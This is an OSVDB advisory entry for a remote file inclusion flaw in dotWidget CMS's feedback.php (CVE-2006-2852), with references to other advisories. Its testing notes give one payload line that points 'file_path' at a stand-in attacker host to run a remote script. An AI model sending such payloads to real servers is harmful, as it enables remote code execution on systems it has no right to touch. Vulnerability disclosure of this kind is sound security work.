dotWidget CMS feedback.php file_path Variable Remote File Inclusion

2006-06-03T10:20:21
ID OSVDB:25982
Type osvdb
Reporter Aesthetico(admin@majorsecurity.de)
Modified 2006-06-03T10:20:21

Description

Vulnerability Description

dotWidget CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to feedback.php not properly sanitizing user input supplied to the 'file_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

dotWidget CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to feedback.php not properly sanitizing user input supplied to the 'file_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

Post data:

file_path=http://[attacker]/[evilscript]

References:

Vendor URL: http://www.dotwidget.com/ Security Tracker: 1016220 Secunia Advisory ID:20463 Related OSVDB ID: 25981 Related OSVDB ID: 25983 Other Advisory URL: http://www.majorsecurity.de/advisory/major_rls7.txt Mail List Post: http://seclists.org/lists/bugtraq/2006/Jun/0055.html ISS X-Force ID: 26918 FrSIRT Advisory: ADV-2006-2141 CVE-2006-2852 Bugtraq ID: 18258